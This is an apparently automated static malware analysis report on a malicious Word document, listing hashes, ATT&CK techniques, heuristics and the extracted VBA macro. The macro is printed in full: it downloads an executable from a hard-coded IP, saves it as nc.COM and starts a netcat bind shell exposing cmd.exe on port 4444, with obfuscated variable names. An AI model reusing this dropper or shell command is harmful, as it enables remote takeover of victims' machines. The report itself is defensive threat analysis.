Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04f8b2f3a092f4ca…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 2.33 MB
Created: 2019-10-14 23:57:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: ba81e3f7ee5d88a20717ea278488da31
SHA-1: c9f6b8a6dc1c3d4227048ed16d0d7c27cd7a1927
SHA-256: 04f8b2f3a092f4cad578fb8e51f02e24b432cf21e4968ed95c3812ae33ff2883
Risk score: 362

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File
  • T1059.003 Windows Command Shell

The VBA script uses CreateObject to instantiate Microsoft.XMLHTTP, ADODB.Stream and WScript.Shell, downloads a file from 'hTtP://92.63.197.172/crypted.exe', saves it to disk as 'nc.COM', and then runs 'nc.COM -L -p 4444 -e cmd.exe': a netcat listener on TCP port 4444 that attaches cmd.exe to any incoming connection (a bind shell, as opposed to a reverse shell that connects outbound). The document body explicitly prompts the user to enable macro content, a common lure.

Heuristics (10)

  • VBA macros detected [medium] (5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
    Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll")
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
    hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP")
  • cmd.exe reference in VBA [high] OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script:
    MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • OLE file has appended executable-looking payload bytes [high] OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL hTtP://92.63.197.172/crypted.exe (referenced by macro)
    URL http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2854 bytes
SHA-256: 3ee9eafc008255268e45a49533bb0662cf1d7f8f2e6a6e6b6f26fd50e10484d8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "moscow"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "moscowwww"
  Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr)
 

Sub ACADFASDFASD()
 
Dim GVuIHNlc2FtZQ
Dim hpamtsbm1vcHF
Dim MTIzNDU2Nzg
 
Set GVuIHNlc2FtZQ = CreateObject("MicrOsofT.XMLHTTP")
Set hpamtsbm1vcHF = CreateObject("ADODB.StrEam")
Set MTIzNDU2Nzg = CreateObject("WScrIpt.ShEll")
 
NTU1NTU = "hTtP://92.63.197.172/crypted.exe" 'Where to download the file from
NDQ0NA = "nc.COM" 'Name to save the file (on the local system)
MzMz = "nc.COM -L -p 4444 -e cmd.exe" 'Command to run after downloading
 
GVuIHNlc2FtZQ.Open "GET", NTU1NTU, False
Sleep 1
GVuIHNlc2FtZQ.send
Sleep 1
hpamtsbm1vcHF.Type = 1
Sleep 2
hpamtsbm1vcHF.Open
Sleep 1
hpamtsbm1vcHF.write GVuIHNlc2FtZQ.responseBody
hpamtsbm1vcHF.savetofile NDQ0NA, 2
Sleep 1
MTIzNDU2Nzg.Run MzMz
 
 
End Sub


Attribute VB_Name = "swxidw"
' Test program for the Base64Coder module.

Option Explicit

Public Sub Main()
   Test1
   Test2
   End Sub

Private Sub Test1()
   Debug.Print "Test1 started."
   Check "Aladdin:open sesame", "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" ' example from RFC 2617
   Check "", ""
   Check "1", "MQ=="
   Check "22", "MjI="
   Check "333", "MzMz"
   Check "4444", "NDQ0NA=="
   Check "55555", "NTU1NTU="
   Check "abc:def", "YWJjOmRlZg=="
   Check "????", "Pz8/Pw=="
   Check "abcdefghijklnmopqrstuvwxyz0123456789???", "YWJjZGVmZ2hpamtsbm1vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Pz8/"
   Debug.Print "Test1 completed."
   End Sub

Private Sub Test2()
   Debug.Print "Test2 started."
   Dim i As Long
   For i = 1 To 10000
      Dim s1 As String: s1 = GenerateRandomString(80)
      Dim s2 As String: s2 = Base64EncodeString(s1)
      Dim s3 As String: s3 = Base64DecodeString(s2)
      If s3 <> s1 Then Debug.Print "Encode/decode failed for """ & s1 & """ / """ & s2 & """ / """ & s3 & """."
      Next
   Debug.Print "Test2 completed."
   End Sub

Private Sub Check(ByVal plainText As String, ByVal base64Text As String)
   Dim s1 As String: s1 = Base64EncodeString(plainText)
   Dim s2 As String: s2 = Base64DecodeString(base64Text)
   If s1 <> base64Text Or s2 <> plainText Then _
      Debug.Print "Check failed for """ & plainText & """ / """ & base64Text & """."
   End Sub

Private Function GenerateRandomString(ByVal MaxLen As Integer) As String
   Dim l As Integer: l = Int(Rnd() * (MaxLen + 1))
   Dim s As String: s = Space$(l)
   Dim p As Integer
   For p = 1 To l: Mid$(s, p, 1) = ChrW$(Int(Rnd * 256)): Next
   GenerateRandomString = s
   End Function